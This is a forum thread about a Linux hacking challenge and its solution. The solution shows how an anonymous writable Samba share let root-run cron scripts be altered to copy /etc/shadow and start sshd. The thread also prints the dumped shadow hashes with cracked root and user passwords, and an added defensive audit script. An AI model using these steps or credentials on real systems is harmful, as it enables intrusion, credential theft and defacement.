pyth0n3

Dump /etc/shadow ; Get ssh access


Posted

Target = ZnJlZXNoZWxsLmhvbWVsaW51eC5uZXQ=

1. Dump /etc/shadow (Note: the permissions are set to -rw-r----- 1 root shadow xxx xxxx-xx-xx xx:xx /etc/shadow)

2. Get ssh access (Note: SSH is not running) but must get ssh access

Optional: (Deface the page )

Time = 48 hours

Hint: The remote system is misconfigured, an attacker may gain access

80/tcp open http

21/tcp filtered ftp

139/tcp open netbios-ssn

445/tcp open microsoft-ds

23/tcp open telnet

53/tcp open domain

5000/tcp open upnp

22/tcp filtered ssh (Note: Service is not running)

OS: Linux Debian 2.26-686

Posted (edited)

The downside of a challenge is when somebody takes the server offline with an exploit or whatever, of course without achieving their goal.

No problem, system down, it ends here! We know script kiddies exist.

To get access no exploit of any kind was needed.

Samba was running on the server, and anyone could connect to it anonymously with read & write permission.

At the same time cron was running two scripts from /usr/local/bin as the root user.

Of course an anonymous user had read/write access to these scripts.

So they could be modified so as to start an ssh server or dump /etc/shadow.

One script was called backup and ran every minute from cron.

So to get the passwords all that was needed was to add a command that copies /etc/shadow into a directory the nobody user has access to, and then download them using samba

Code:

cat /etc/shadow > /public/pass_to_download 

and download the passwords.

In the second script one could, for example, start ssh:

#!/bin/bash
# Logs whether sshd is running; if it is not, starts it and logs the result.
LOG=/var/log/sshlog
SERVICE='sshd'

if ps ax | grep -v grep | grep "$SERVICE" > /dev/null
then
    echo "$(date) $SERVICE service running, everything is fine" >> "$LOG"
else
    echo "$(date) $SERVICE is not running" >> "$LOG"
    echo "$(date) $(/etc/init.d/ssh start)" >> "$LOG"
fi

All that was needed was a bit of bash code that starts sshd.

The passwords were cracked with john and one could then connect over ssh.

To deface the page, an anonymous user connected to the samba server in /var/www and replaced the page with a different one.

All of this could be done from Windows or, well, a unix/linux system.

No password was needed.

Connecting to the School's file servers (Samba shares) from Windows XP

From linux:

sudo smbclient -L host -N

-N for anonymous

-L to list the shares

sudo smbclient //host/path_to_directory -N

get or put for download and upload

Or, well, one could smbmount it into a directory.

Password file

root:$1$lAYHe99p$mC7AsGKl5olnuGeTlzuwh.:14932:0:99999:7:::
daemon:!!:14884:0:99999:7:::
bin:!!:14884:0:99999:7:::
sys:!!:14884:0:99999:7:::
sync:!!:14884:0:99999:7:::
games:!!:14884:0:99999:7:::
man:!!:14884:0:99999:7:::
lp:!!:14884:0:99999:7:::
mail:!!:14884:0:99999:7:::
news:!!:14884:0:99999:7:::
uucp:!!:14884:0:99999:7:::
proxy:!!:14884:0:99999:7:::
www-data:!!:14884:0:99999:7:::
backup:!!:14884:0:99999:7:::
list:!!:14884:0:99999:7:::
irc:!!:14884:0:99999:7:::
gnats:!!:14884:0:99999:7:::
nobody:!!:14884:0:99999:7:::
libuuid:!:14884:0:99999:7:::
Debian-exim:!:14884:0:99999:7:::
statd:!!:14884:0:99999:7:::
messagebus:!!:14884:0:99999:7:::
avahi:!!:14884:0:99999:7:::
haldaemon:!!:14884:0:99999:7:::
hplip:!!:14884:0:99999:7:::
sshd:!!:14902:0:99999:7:::
telnetd:!!:14926:0:99999:7:::
bind:!!:14926:0:99999:7:::
david:$1$m6nPi1bo$jnLrqPmtMVE9Anqk4hzzl.:14932:0:::::0

Video -> Watch Online

David = abc123

Root = tester123

If anyone is interested in creating a challenge or wants to help me make more, contact me.

Edited by pyth0n3
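The chain described in the write-up (a guest-writable Samba share exposing scripts that root's cron runs every minute) is straightforward to audit for. The script below is an added example, not code from this thread or its author. It builds a constructed sample tree with hypothetical share names, script names and cron lines, then checks it; the function names `setup_sample`, `guest_writable_shares`, `writable_cron_scripts` and `run_audit` are my own. The Samba keys it looks for (`guest ok`, `public`, `writable`, `writeable`, `read only`) are the real smb.conf options.

```shell
#!/bin/sh
# Added audit example, not code from this thread or its author. It looks for the
# two misconfigurations the write-up chains together: Samba shares that grant
# guest (anonymous) write access, and root cron jobs whose script file is
# world-writable. With AUDIT_ROOT unset it builds and scans a constructed sample
# tree; set AUDIT_ROOT=/ to scan a real host (read-only, it changes nothing).

AUDIT_ROOT="${AUDIT_ROOT:-}"

# Constructed sample tree (hypothetical share names, script names and cron lines).
setup_sample() {
    AUDIT_ROOT=$(mktemp -d)
    mkdir -p "$AUDIT_ROOT/etc/samba" "$AUDIT_ROOT/etc/cron.d" "$AUDIT_ROOT/usr/local/bin"
    cat > "$AUDIT_ROOT/etc/crontab" <<'EOF'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user command
* * * * * root /usr/local/bin/backup
*/5 * * * * root /usr/local/bin/check_ssh
0 3 * * * root /usr/local/bin/rotate
@reboot root /usr/local/bin/rotate
17 * * * * root cd / && run-parts --report /etc/cron.hourly
EOF
    for s in backup check_ssh rotate; do
        printf '#!/bin/sh\necho %s\n' "$s" > "$AUDIT_ROOT/usr/local/bin/$s"
    done
    chmod 777 "$AUDIT_ROOT/usr/local/bin/backup" "$AUDIT_ROOT/usr/local/bin/check_ssh"  # the bad ones
    chmod 755 "$AUDIT_ROOT/usr/local/bin/rotate"                                      # as it should be
    cat > "$AUDIT_ROOT/etc/samba/smb.conf" <<'EOF'
[global]
   workgroup = WORKGROUP
   map to guest = Bad User
[public]
   path = /public
   guest ok = yes
   writable = yes
[scripts]
   path = /usr/local/bin
   public = yes
   read only = no
[docs]
   path = /srv/docs
   guest ok = yes
   read only = yes
EOF
}

# Shares a guest can write to: "guest ok"/"public" = yes combined with
# "writable"/"writeable" = yes or "read only" = no. Prints "<share> <path>".
# Simplified parser: per-share keys only, [global] defaults are not inherited.
guest_writable_shares() {
    awk '
        function flush() { if (sec != "" && sec != "global" && guest && wr) print sec, path }
        /^[[:space:]]*\[/ { flush(); sec = $0; sub(/^[[:space:]]*\[/, "", sec); sub(/\].*$/, "", sec)
                            guest = 0; wr = 0; path = ""; next }
        /^[[:space:]]*[;#]/ { next }
        { line = tolower($0); gsub(/[[:space:]]/, "", line) }
        tolower($0) ~ /^[[:space:]]*path[[:space:]]*=/ { path = $0; sub(/^[^=]*=[[:space:]]*/, "", path); sub(/[[:space:]]+$/, "", path) }
        line == "guestok=yes" || line == "public=yes" { guest = 1 }
        line == "writable=yes" || line == "writeable=yes" || line == "readonly=no" { wr = 1 }
        END { flush() }
    ' "$AUDIT_ROOT/etc/samba/smb.conf"
}

# Cron jobs (system crontab and /etc/cron.d) whose absolute script path is
# world-writable. Prints "<user> <script> <crontab file>". On a real host also
# confirm the script and its directory are owned by root; that check is left out
# here because the sample tree is created by whoever runs this.
writable_cron_scripts() {
    for f in "$AUDIT_ROOT/etc/crontab" "$AUDIT_ROOT"/etc/cron.d/*; do
        [ -f "$f" ] || continue
        grep -Ev '^[[:space:]]*(#|$)' "$f" | while read -r min hr dom mon dow user cmd rest; do
            case "$min" in
                *=*) continue ;;              # SHELL=, PATH=, MAILTO= lines
                @*)  user=$hr; cmd=$dom ;;    # @reboot/@daily lines have fewer fields
            esac
            case "$cmd" in /*) ;; *) continue ;; esac   # only absolute paths are checked
            target="${AUDIT_ROOT%/}$cmd"
            [ -f "$target" ] || continue
            if [ -n "$(find "$target" -prune -perm -002 -print)" ]; then
                echo "$user $cmd $f"
            fi
        done
    done
}

# The chain from the write-up: a root cron script sitting inside a guest-writable
# share means anyone on the network can rewrite what root runs.
run_audit() {
    [ -n "$AUDIT_ROOT" ] || setup_sample
    writable_cron_scripts | while read -r user script file; do
        echo "WORLD-WRITABLE cron script $script (runs as $user, from $file)"
    done
    guest_writable_shares | while read -r share spath; do
        echo "ANON-WRITE share [$share] exports $spath"
        writable_cron_scripts | while read -r user script file; do
            case "$script" in
                "$spath"/*) echo "CHAIN: root cron job $script is inside guest-writable share [$share]" ;;
            esac
        done
    done
}

run_audit
```

On the sample tree this reports the two world-writable cron scripts, the two guest-writable shares, and two CHAIN lines for the scripts that live under the [scripts] share; the properly permissioned rotate script and the read-only [docs] share are not reported. The fix on the real host is the obvious one: scripts run by root's cron must be owned by root and writable by root only, and no share that accepts guest connections should be writable, least of all one that exports /usr/local/bin or /var/www.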
Posted
what linux distribution do you use? it looks very good :D

He uses Debian. Thanks to the idiots who fucked up the server: they wget'ed an exploit for 2.6, ran it, and then, having wet their pants, destroyed the challenge.

Posted

I wasn't referring to the test system but to the desktop he worked from, or is that Debian too? + didn't he shut the server down himself? because I see he's already posted the solution
